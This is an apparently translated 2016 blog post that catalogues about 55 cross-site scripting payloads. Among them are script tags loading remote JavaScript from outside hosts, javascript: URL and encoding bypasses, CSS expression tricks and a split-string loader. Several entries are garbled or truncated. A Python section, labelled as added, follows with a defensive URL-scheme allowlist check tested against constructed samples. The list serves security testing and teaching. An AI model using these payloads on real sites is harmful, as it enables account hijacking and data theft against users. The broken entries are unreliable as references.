XSS attack roundup

Posted on 2016-4-28 10:06:15

(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up alerts

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) IMG tag with corrected defect

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tab splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, since there is nowhere to make use of them

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double opening angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an opening angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
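The common thread in entries (3)-(5), (8)-(14), (17) and (19) above is that a filter which simply looks for the substring "javascript:" is defeated by case changes, HTML character references (with or without semicolons), embedded tab/newline/carriage-return characters, NUL bytes and leading control characters, because the browser normalizes all of these away before it resolves the URL. The defensive answer is to normalize the same way the browser does and then apply an allowlist of URL schemes rather than a denylist. The code below is an added example, not part of the original post: it uses Python's html.unescape as a stand-in for browser character-reference decoding, and every sample payload in it is constructed from the cases in the post (labels refer to the post's numbering). It shows that the naive denylist misses nine of the twelve constructed attack values while the allowlist check rejects all twelve and still accepts ordinary links.

```python
"""Defensive check for the javascript:-URL obfuscation tricks listed in the post.

Added example (not the poster's code). It normalizes an attribute value the way
a lenient HTML parser would before resolving it as a URL, then checks the scheme
against an allowlist. Sample payloads are constructed from the post's cases.
"""
import html
import re

# Tab, LF, CR and NUL were historically ignored inside a URL scheme (cases
# 11-14, 17-18); leading C0 controls and spaces are skipped before it (case 19).
_IGNORED_IN_SCHEME = re.compile(r"[\t\n\r\x00]")
_LEADING_JUNK = re.compile(r"^[\x00-\x20]+")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")
ALLOWED_SCHEMES = {"http", "https"}  # allowlist; extend (e.g. "mailto") only when needed


def normalize_url_attribute(value: str) -> str:
    """Collapse the encoding tricks to the plain form the browser acts on:
    decode character references (decimal or hex, with or without ';', any
    number of leading zeros: cases 5, 8-10), drop embedded tab/LF/CR/NUL,
    and strip leading control characters and spaces."""
    decoded = html.unescape(value)            # &#106; &#0000106 &#x6A -> 'j'
    decoded = _IGNORED_IN_SCHEME.sub("", decoded)
    return _LEADING_JUNK.sub("", decoded)


def extract_scheme(value: str):
    """Lower-cased URL scheme of the normalized value, or None for a relative URL."""
    m = _SCHEME.match(normalize_url_attribute(value))
    return m.group(1).lower() if m else None


def naive_is_blocked(value: str) -> bool:
    """The substring denylist many filters start with; kept only to show what it misses."""
    return "javascript:" in value.lower()


def is_safe_url(value: str) -> bool:
    """Allowlist check: relative URLs and http(s) only. Protocol-relative URLs
    (//host/...) carry no scheme and pass here; restrict hosts separately if needed."""
    scheme = extract_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


# Constructed samples, one per technique in the post (labels use its numbering).
HEX_NO_SEMICOLON = ("&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A"
                    "&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29")
ATTACK_SAMPLES = [
    ("3 plain", "javascript:alert('XSS')"),
    ("4 mixed case", "JaVaScRiPt:alert('XSS')"),
    ("5 decimal entities", "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')"),
    ("9 7-digit decimal, no ;", "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
                                "&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')"),
    ("10 hex, no ;", HEX_NO_SEMICOLON),
    ("11 embedded tab", "jav\tascript:alert('XSS')"),
    ("12 encoded tab", "jav&#x09;ascript:alert('XSS')"),
    ("13 encoded newline", "jav&#x0A;ascript:alert('XSS')"),
    ("14 encoded carriage return", "jav&#x0D;ascript:alert('XSS')"),
    ("17 NUL byte", "java\x00script:alert(\"XSS\")"),
    ("19 leading control char and spaces", "&#14;  javascript:alert('XSS')"),
    ("vbscript scheme", "vbscript:msgbox(\"XSS\")"),
]
BENIGN_SAMPLES = ["https://example.com/page?a=1&b=2", "/relative/path", "page.html#top"]


def naive_misses():
    """Labels of attack samples the substring denylist lets through."""
    return [label for label, v in ATTACK_SAMPLES if not naive_is_blocked(v)]


def allowlist_rejects_all_attacks() -> bool:
    return all(not is_safe_url(v) for _, v in ATTACK_SAMPLES)


def allowlist_accepts_benign() -> bool:
    return all(is_safe_url(v) for v in BENIGN_SAMPLES)


if __name__ == "__main__":
    for label, v in ATTACK_SAMPLES:
        print(f"{label:38} naive_blocked={naive_is_blocked(v)!s:5} allowlist_safe={is_safe_url(v)}")
    print("denylist misses:", naive_misses())
```

The normalization is deliberately more permissive than any single modern browser so that a server-side check never accepts something some client would still execute. Note that an allowlist on the scheme alone does not cover entries such as (37)-(39) and (46)-(53), where the value lands in CSS or a style attribute; those contexts need their own output encoding or should not accept user input at all.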